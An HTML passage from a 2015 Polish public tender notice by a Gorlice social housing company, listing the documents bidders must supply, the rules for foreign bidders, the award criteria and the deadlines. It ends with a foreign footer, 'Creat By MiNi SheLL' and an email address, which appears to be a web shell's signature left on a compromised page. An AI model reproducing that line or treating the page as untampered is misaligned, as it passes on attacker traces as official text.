<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Okres gwarancji - 35</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gtbs.gorlice.pl ,   www.gorlice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GORLICKIE TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO SPÓŁKA Z O. O.  
Plac Kościelny 2,  38-300 Gorlice,  tel./fax. 18/ 353-58-10, woj. małopolskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2015 godzina 10:00, miejsce: GORLICKIE TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO SPÓŁKA Z O. O.  
Plac Kościelny 2  38-300 Gorlice, sekretariat,  woj. małopolskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com